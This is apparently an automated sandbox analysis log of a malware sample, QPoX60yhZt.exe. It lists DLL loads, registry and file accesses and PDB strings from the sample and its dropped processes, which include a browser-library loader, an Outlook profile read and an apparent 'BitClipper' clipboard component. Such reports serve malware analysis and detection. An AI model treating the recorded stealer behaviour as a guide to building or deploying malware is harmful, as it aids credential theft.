Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: d3d9.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dataexchange.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dcomp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: msctfui.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: d3dcompiler_47.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\BAEBFIIECB.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: oledlg.dll
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: pla.dll
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: pdh.dll
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: tdh.dll
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: wevtapi.dll
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\u5mc.2\run.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll

Source: C:\Users\user\Desktop\QPoX60yhZt.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\u5mc.0.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: C:\Users\user\Desktop\QPoX60yhZt.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: QPoX60yhZt.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: QPoX60yhZt.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: QPoX60yhZt.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: QPoX60yhZt.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: QPoX60yhZt.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: QPoX60yhZt.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: QPoX60yhZt.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: u5mc.0.exe, 00000001.00000002.2187775846.000000006BA8D000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: /_/obj/Release/Microsoft.ApplicationInsights/net46/Microsoft.ApplicationInsights.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2958500599.0000019524C80000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: nss3.pdb@ source: u5mc.0.exe, 00000001.00000002.2188024123.000000006BC4F000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveHUD\obj\Debug\PerceiveHUD.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2951549054.00000195248D0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Cleanup\obj\Release\Cleanup.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950031263.0000019524710000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdbz9 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: c:\release\WorkingDir\PrismLibraryBuild\PrismLibrary\Desktop\Prism\obj\Release\Microsoft.Practices.Prism.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2956758607.0000019524BD0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: wntdll.pdb source: run.exe, 00000002.00000002.1853013778.00000000040C4000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000002.1853424505.00000000048D3000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000002.00000002.1853184012.0000000004420000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082097124.0000000004E45000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2082757737.0000000005320000.00000004.00001000.00020000.00000000.sdmp, run.exe, 00000014.00000002.2225745803.00000000042DA000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000014.00000002.2225119329.0000000003E20000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000014.00000002.2224774444.0000000003ACA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Bootstrap\obj\Release\Bootstrap.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb\| source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2959550582.0000019524DE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: mozglue.pdb source: u5mc.0.exe, 00000001.00000002.2187775846.000000006BA8D000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: run.exe, 00000002.00000002.1851199040.00000000002EC000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000002.00000000.1781422592.00000000002EC000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000014.00000000.2132304102.00000000002EC000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000014.00000002.2222284891.00000000002EC000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Telemetry\obj\Release\Telemetry.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2969194740.00000195253D0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb^ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2969703290.0000019525400000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Downloader\obj\Release\Downloader.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2947178540.00000195245B0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb@=Z= L=_CorDllMainmscoree.dll source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: run.exe, 00000002.00000002.1853871148.000000006C367000.00000002.00000001.01000000.0000000A.sdmp, run.exe, 00000014.00000002.2226380643.000000006CCB7000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: EntitlementDefinitions.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950146568.0000019524750000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_en-us\obj\Release\Locale_en-us.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2949876719.0000019524700000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdbSHA256M$ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2969703290.0000019525400000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdbjD source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2947237762.00000195245C0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: M:\DATA\Projects\BitClipper2017\Release\BitClipper2017.pdb source: BAEBFIIECB.exe, 00000012.00000002.2887742911.000000000074C000.00000002.00000001.01000000.00000016.sdmp, BAEBFIIECB.exe, 00000012.00000000.2091744487.000000000074C000.00000002.00000001.01000000.00000016.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ko-kr\obj\Release\Locale_ko-kr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdbF source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdbf source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb. source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2935230586.000001951BD63000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2954807445.0000019524B20000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_it-it\obj\Release\Locale_it-it.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2024395013.0000019509A2B000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2949744272.00000195246F0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2947237762.00000195245C0000.00000004.08000000.00040000.00000000.sdmp
